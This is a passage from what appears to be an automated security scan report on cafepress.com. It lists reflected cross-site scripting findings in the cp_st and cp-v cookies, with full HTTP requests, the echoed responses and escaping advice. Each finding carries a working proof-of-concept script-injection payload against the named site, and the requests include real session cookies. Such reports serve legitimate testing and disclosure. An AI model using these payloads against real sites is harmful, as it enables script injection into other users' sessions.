HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 53742 Date: Sun, 26 Dec 2010 13:48:07 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 53742 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-mugs
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0403</script><script>alert(1)</script>51550576faa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response: in the response below it appears inside the single-quoted window.cafepress.tealeaf.searchTerm assignment. The payload contains no quote character and does not need to leave the string literal at all; the browser's HTML parser ends the script element at the injected </script>, and the <script>alert(1)</script> that follows is parsed as a new script element, so a fix that only escapes quotes would not close this sink. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, which considerably mitigates the impact. Note, however, that the application's own cookies are scoped to domain=cafepress.com and the page is served over plain HTTP, so a cookie planted from any other host within that domain, or injected by an attacker on the network path, would satisfy that precondition; the Information rating should be revisited if either is in scope.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; a safer pattern is to pass the value through an HTML attribute (for example a data- attribute) with ordinary HTML entity encoding and read it from script. Where the value must be written into a string literal inside a script element, every non-alphanumeric character should be emitted as a \uXXXX (or \xHH) escape, covering both quote characters, the backslash, the angle brackets and slash that form the </script> sequence, and the U+2028 and U+2029 line terminators. Escaping quotes alone is not sufficient: the HTML parser terminates the script element at the first </script> it encounters, regardless of how the surrounding JavaScript is quoted.
Request
GET /make/custom-mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d0403</script><script>alert(1)</script>51550576faa ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 53764 Date: Sun, 26 Dec 2010 13:48:05 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 53764 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'd0403</script><script>alert(1)</script>51550576faa ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-stickers
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 181d3"-alert(1)-"e0b5be905e5 was submitted in the cp-v cookie, appended to the existing cookie value. This input was echoed unmodified in the application's response: in the response below it appears inside the double-quoted s.eVar30 analytics assignment, where the embedded double quote terminates the string literal and the remainder is parsed as JavaScript. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, which considerably mitigates the impact. Note, however, that the application's own cookies are scoped to domain=cafepress.com and the page is served over plain HTTP, so a cookie planted from any other host within that domain, or injected by an attacker on the network path, would satisfy that precondition; the Information rating should be revisited if either is in scope.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; a safer pattern is to pass the value through an HTML attribute (for example a data- attribute) with ordinary HTML entity encoding and read it from script. Where the value must be written into a string literal inside a script element, every non-alphanumeric character should be emitted as a \uXXXX (or \xHH) escape, covering both quote characters, the backslash, the angle brackets and slash that form the </script> sequence, and the U+2028 and U+2029 line terminators. Escaping quotes alone is not sufficient: the HTML parser terminates the script element at the first </script> it encounters, regardless of how the surrounding JavaScript is quoted.
Request
GET /make/custom-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 55169 Date: Sun, 26 Dec 2010 13:48:14 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55169 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-stickers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4548</script><script>alert(1)</script>1bf2219952e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response: in the response below it appears inside the single-quoted window.cafepress.tealeaf.searchTerm assignment. The payload contains no quote character and does not need to leave the string literal at all; the browser's HTML parser ends the script element at the injected </script>, and the <script>alert(1)</script> that follows is parsed as a new script element, so a fix that only escapes quotes would not close this sink. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, which considerably mitigates the impact. Note, however, that the application's own cookies are scoped to domain=cafepress.com and the page is served over plain HTTP, so a cookie planted from any other host within that domain, or injected by an attacker on the network path, would satisfy that precondition; the Information rating should be revisited if either is in scope.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; a safer pattern is to pass the value through an HTML attribute (for example a data- attribute) with ordinary HTML entity encoding and read it from script. Where the value must be written into a string literal inside a script element, every non-alphanumeric character should be emitted as a \uXXXX (or \xHH) escape, covering both quote characters, the backslash, the angle brackets and slash that form the </script> sequence, and the U+2028 and U+2029 line terminators. Escaping quotes alone is not sufficient: the HTML parser terminates the script element at the first </script> it encounters, regardless of how the surrounding JavaScript is quoted.
Request
GET /make/custom-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a4548</script><script>alert(1)</script>1bf2219952e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 55191 Date: Sun, 26 Dec 2010 13:48:12 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55191 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'a4548</script><script>alert(1)</script>1bf2219952e ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-stockings
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a524"-alert(1)-"630f88fb7a4 was submitted in the cp-v cookie, appended to the existing cookie value. This input was echoed unmodified in the application's response: in the response below it appears inside the double-quoted s.eVar30 analytics assignment, where the embedded double quote terminates the string literal and the remainder is parsed as JavaScript. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, which considerably mitigates the impact. Note, however, that the application's own cookies are scoped to domain=cafepress.com and the page is served over plain HTTP, so a cookie planted from any other host within that domain, or injected by an attacker on the network path, would satisfy that precondition; the Information rating should be revisited if either is in scope.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; a safer pattern is to pass the value through an HTML attribute (for example a data- attribute) with ordinary HTML entity encoding and read it from script. Where the value must be written into a string literal inside a script element, every non-alphanumeric character should be emitted as a \uXXXX (or \xHH) escape, covering both quote characters, the backslash, the angle brackets and slash that form the </script> sequence, and the U+2028 and U+2029 line terminators. Escaping quotes alone is not sufficient: the HTML parser terminates the script element at the first </script> it encounters, regardless of how the surrounding JavaScript is quoted.
Request
GET /make/custom-stockings HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 52631 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 52631 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-stockings
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75fbc</script><script>alert(1)</script>3209aface0d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response: in the response below it appears inside the single-quoted window.cafepress.tealeaf.searchTerm assignment. The payload contains no quote character and does not need to leave the string literal at all; the browser's HTML parser ends the script element at the injected </script>, and the <script>alert(1)</script> that follows is parsed as a new script element, so a fix that only escapes quotes would not close this sink. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, which considerably mitigates the impact. Note, however, that the application's own cookies are scoped to domain=cafepress.com and the page is served over plain HTTP, so a cookie planted from any other host within that domain, or injected by an attacker on the network path, would satisfy that precondition; the Information rating should be revisited if either is in scope.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; a safer pattern is to pass the value through an HTML attribute (for example a data- attribute) with ordinary HTML entity encoding and read it from script. Where the value must be written into a string literal inside a script element, every non-alphanumeric character should be emitted as a \uXXXX (or \xHH) escape, covering both quote characters, the backslash, the angle brackets and slash that form the </script> sequence, and the U+2028 and U+2029 line terminators. Escaping quotes alone is not sufficient: the HTML parser terminates the script element at the first </script> it encounters, regardless of how the surrounding JavaScript is quoted.
Request
GET /make/custom-stockings HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=75fbc</script><script>alert(1)</script>3209aface0d ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
